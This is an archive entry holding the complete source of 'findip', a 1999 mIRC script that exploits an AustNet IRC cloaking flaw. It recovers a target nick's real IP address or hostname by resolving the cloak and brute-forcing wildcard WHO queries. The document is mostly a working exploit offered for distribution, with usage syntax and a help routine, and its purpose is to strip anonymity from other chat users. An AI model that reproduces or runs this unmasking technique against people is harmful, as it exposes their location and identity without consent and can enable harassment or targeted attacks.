Findip.mrc is a mIRC script written in response to a BugTraq post about an AustNet vulnerability - findip determines the real host or IP of a given nick if either is cloaked behind an AustNet Virtual World account.
84435972fcbd6c9a22cc3a395fcf8e28a15a22e8160c53c8a2aa0d07d316330c
;findip v2.0 by joepeg (jo3) [Skank4ska@Rocketmail.com]
;040799
;
;findip determines the real host or IP of a given nick if either is cloaked behind
;an AustNet Virtual World account.
;
;Syntax: /findip [-h host_pattern] <nickname>
;
; -h - switch to let the script know you are scanning for a host rather than IP
; If switch is not used, findip will, by default, attempt to determine the IP
; host_pattern - basic host pattern of nickname's real host.
; All number positions must be replaced with #'s
;
; example host: max-10-123.goulburn.net.au
; host pattern: max-##-###.goulburn.net.au
;
; To learn more on determining host pattern: http://www.2600.org.au/austnet-hack.html
; nickname - IRC nickname of user who's host/IP you are trying to determine
;
;NOTE: this script has very little error checking, but should be easy to understand with the Status window replies.
;
;You are welcome to distribute this source freely with appropriate credit to the author. (joepeg@EFnet - Skank4ska@Rocketmail.com)
;If you wish to alter it, please acknowledge the origional author in its distribution, and email the new source to his address.
;
;For clarity, this script was derived completely from the information found at http://www.2600.org.au/austnet-hack.html.
;I have no AustNet experience, nor do I have any further knowledge (about AustNet, this exploit, or any of its components) than
;what is found at the above URL.
;
;Please send any comments or gripes to Skank4ska@Rocketmail.com
;Enjoy - .joepeg
alias findip {
if ($1 == $null) {
findiphelp
halt
}
if ($1 == -h) {
if ($3 == $null) {
findiphelp
halt
}
echo -a [findip]: Scanning for host...
unset %findip.*
set %findip.status on
set %findip.host $2
set %findip.nick $3
set %findip.realcount $count(%findip.host,$chr(35))
set %findip.tempcount 1
set %findip.replycount 0
set %findip.findhost true
set %findip.pos $pos(%findip.host,$chr(35),1)
findip3
}
else {
echo -a [findip]: Scanning for IP...
unset %findip.*
set %findip.status on
set %findip.nick $1
set %findip.replycount 0
dns %findip.nick
}
}
alias findip2 {
set %findip.num 0
:again
who %findip.ip $+ %findip.num $+ $chr(42)
inc %findip.num
if (%findip.num > 9) {
halt
}
goto again
}
alias findip3 {
set %findip.num 0
:again
if (%findip.pos > 1) { set %findip.hosttemp $mid(%findip.host,1,$calc(%findip.pos - 1)) $+ %findip.num $+ $mid(%findip.host,$calc(%findip.pos + 1), $len(%findip.host)) }
else { set %findip.hosttemp %findip.num $+ $mid(%findip.host,$calc(%findip.pos + 1), $len(%findip.host)) }
who $replace(%findip.hosttemp,$chr(35),$chr(42))
inc %findip.num
if (%findip.num > 9) {
halt
}
goto again
}
alias findiphelp {
echo -a $chr(160)
echo -a Findip by jo3
echo -a -------------
echo -a Findip determines the real IP or hostname of the given nick
echo -a when cloaked by an AustNet's Virtual World account
echo -a usage:
echo -a /findip [-h hostname] <nickname>
echo -a $chr(160)
}
on 1:DNS: {
if (%findip.status == on) {
if ($iaddress == $null) {
echo -a [findip]: Unable to resolve cloaked IP. Stopping.
unset %findip.*
halt
}
set %findip.ip $gettok($iaddress,1-2,46) $+ $chr(46)
findip2
}
}
raw 352:*: {
if (%findip.status == on) {
if ($6 == %findip.nick) {
set %findip.grabip on
set %findip.ipgrabbed true
set %findip.replycount $calc(%findip.replycount - 10)
}
}
}
raw 315:*: {
if (%findip.status == on) {
inc %findip.replycount
if (%findip.grabip == on) {
if (%findip.findhost == true) {
set %findip.host $mid($2,1,$calc(%findip.pos)) $+ $mid(%findip.host,$calc(%findip.pos + 1), $len(%findip.host))
set %findip.grabip off
inc %findip.tempcount
if (%findip.tempcount > %findip.realcount) {
echo -a [findip]: Real Host Found! %findip.nick $+ @ $+ %findip.host
unset %findip.*
halt
}
set %findip.pos $pos(%findip.host,$chr(35),1)
findip3
}
else {
set %findip.ip $left($2, $calc($len($2) - 1))
set %findip.grabip off
if ($count(%findip.ip,$chr(46)) == 2) {
if ($gettok(%findip.ip,3,46) > 0 && $gettok(%findip.ip,3,46) < 26) { findip2 }
else {
set %findip.ip %findip.ip $+ $chr(46)
findip2
}
}
if ($count(%findip.ip,$chr(46)) == 3) {
if ($gettok(%findip.ip,4,46) > 0 && $gettok(%findip.ip,4,46) < 26) { findip2 }
else {
echo -a [findip]: Real IP Found! %findip.nick $+ @ $+ %findip.ip
unset %findip.*
halt
}
}
}
}
else {
if (%findip.replycount > 9) {
if (%findip.findhost == true) {
if (%findip.ipgrabbed != true) {
echo -a [findip]: Unable to determine real host. Stopping.
echo -a [findip]: You may wish to try an alternative host pattern if exists.
unset %findip.*
halt
}
else { unset %findip.ipgrabbed }
}
else {
echo -a [findip]: Unable to determine real IP. Stopping.
echo -a [findip]: You may have to scan for host.
unset %findip.*
halt
}
}
}
}
}